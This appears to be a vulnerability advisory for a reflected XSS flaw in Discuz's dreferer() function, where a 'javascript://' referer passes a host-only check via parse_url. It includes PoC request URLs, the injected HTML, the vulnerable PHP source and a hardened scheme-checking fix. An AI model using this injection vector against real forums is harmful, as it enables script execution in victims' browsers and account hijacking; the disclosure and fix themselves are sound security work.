### Brief description:
XSS caused by a defect in the dreferer() function.
### Details:
Requesting `member.php?mod=logging&action=login&referer=javascript://www.discuz.net/` returns a page whose redirect script and fallback link both carry the unchecked `referer` value:
```
<p>Welcome back, Newbie xx, you will now be taken to the page you were on before logging in<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p>
<p class="alert_btnleft"><a href="javascript://www.discuz.net/">If your browser does not redirect automatically, please click this link</a></p>
```
```
The same value reaches the QQ Connect error page through `connect.php?receive=yes&mod=login&op=callback&referer=javascript://www.discuz.net/`:
```
<p>Sorry, there is currently a network problem or the server is busy. Detailed error: connect_error_code_0, error code: <a target=_blank href="http://wiki.opensns.qq.com/wiki/%E3%80%90QQ%E7%99%BB%E5%BD%95%E3%80%91%E5%85%AC%E5%85%B1%E8%BF%94%E5%9B%9E%E7%A0%81%E8%AF%B4%E6%98%8E">openId signature invalid</a>, please try again later. Thank you.<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p>
<p class="alert_btnleft"><a href="javascript://www.discuz.net/">If your browser does not redirect automatically, please click this link</a></p>
```
```
source/function/function_core.php:
```
function dreferer($default = '') {
    ......
    // A referer that points back at the login page is replaced by $default.
    if(strpos($_G['referer'], 'member.php?mod=logging')) {
        $_G['referer'] = $default;
    }
    // Only the host component is inspected from here on; the scheme is never checked.
    $reurl = parse_url($_G['referer']);
    if(!empty($reurl['host']) && !in_array($reurl['host'], array($_SERVER['HTTP_HOST'], 'www.'.$_SERVER['HTTP_HOST'])) && !in_array($_SERVER['HTTP_HOST'], array($reurl['host'], 'www.'.$reurl['host']))) {
        // Foreign host: kept only if it is a configured app domain, a listed domain,
        // or lies under a configured root domain; otherwise fall back to the site index.
        if(!in_array($reurl['host'], $_G['setting']['domain']['app']) && !isset($_G['setting']['domain']['list'][$reurl['host']])) {
            $domainroot = substr($reurl['host'], strpos($reurl['host'], '.')+1);
            if(empty($_G['setting']['domain']['root']) || (is_array($_G['setting']['domain']['root']) && !in_array($domainroot, $_G['setting']['domain']['root']))) {
                $_G['referer'] = $_G['setting']['domain']['defaultindex'] ? $_G['setting']['domain']['defaultindex'] : 'index.php';
            }
        }
    } elseif(empty($reurl['host'])) {
        // No host at all: treated as a site-relative path and prefixed with the site URL.
        $_G['referer'] = $_G['siteurl'].'./'.$_G['referer'];
    }
    $_G['referer'] = durlencode($_G['referer']);
    return $_G['referer'];
}
```
This code runs the referer through parse_url and compares the resulting host with $_SERVER['HTTP_HOST'] to decide whether the target is on-site. parse_url performs no validation of its own, however: `javascript://www.discuz.net/` parses to scheme `javascript` and host `www.discuz.net`, so on a site whose HTTP_HOST is discuz.net or www.discuz.net the host comparison succeeds and the scheme is never examined. The value is then written verbatim into `window.location.href` and into the fallback link's `href`, where the browser treats it as a `javascript:` URL; the `//www.discuz.net/` portion is merely a JavaScript line comment. A js URI therefore passes the domain check and gets executed as script.
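To make the gap concrete, here is an added example that is not Discuz code: a cut-down model of the host comparison in dreferer() next to a variant that also checks the scheme. `$site_host` stands in for `$_SERVER['HTTP_HOST']`, the `$_G['setting']['domain']` allow-lists are omitted because they only add further accepted hosts, and the function names and all sample referers except the report's `javascript://www.discuz.net/` are assumptions.

```php
<?php
// Added example, not Discuz's own code. referer_host_ok() models the host
// comparison in dreferer(); referer_ok_hardened() adds the scheme check the
// original lacks. $site_host stands in for $_SERVER['HTTP_HOST'].

function referer_host_ok(string $referer, string $site_host): bool {
    $u = parse_url($referer);
    if ($u === false) {
        return false;
    }
    if (empty($u['host'])) {
        return true;   // no host: dreferer() prefixes $_G['siteurl'] and accepts it
    }
    // The original test: host equals HTTP_HOST, with or without a "www." prefix.
    return in_array($u['host'], [$site_host, 'www.' . $site_host], true)
        || in_array($site_host, [$u['host'], 'www.' . $u['host']], true);
}

function referer_ok_hardened(string $referer, string $site_host): bool {
    $u = parse_url($referer);
    if ($u === false) {
        return false;
    }
    // parse_url() does not validate the scheme: "javascript://host/" yields
    // scheme=javascript, host=host, exactly like an http URL would. Accept
    // only http(s), or no scheme at all for a site-relative path.
    $scheme = strtolower($u['scheme'] ?? '');
    if ($scheme !== '' && $scheme !== 'http' && $scheme !== 'https') {
        return false;
    }
    if (empty($u['host'])) {
        return true;
    }
    return in_array($u['host'], [$site_host, 'www.' . $site_host], true)
        || in_array($site_host, [$u['host'], 'www.' . $u['host']], true);
}

// Constructed sample referers; the javascript:// entry is the report's PoC value,
// the mixed-case one shows why the scheme comparison must be case-insensitive.
$cases = [
    'http://www.discuz.net/forum.php',
    'forum.php?mod=viewthread&tid=1',
    'javascript://www.discuz.net/',
    'JavaScript://www.discuz.net/',
    'http://evil.example/',
];
foreach ($cases as $c) {
    printf("%-36s original: %-5s hardened: %s\n", $c,
        referer_host_ok($c, 'discuz.net') ? 'pass' : 'block',
        referer_ok_hardened($c, 'discuz.net') ? 'pass' : 'block');
}
```

Run with `php`, the two `javascript:` entries pass the original host-only check and are blocked by the hardened one, while the http and relative entries are treated identically by both. The scheme check belongs before the host comparison so that no later allow-list branch can reinstate a non-http target.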
### Proof of vulnerability:
![Proof-of-concept screenshot](https://images.seebug.org/upload/201503/0612150511445998c695ba3944b540af80f37efc.png)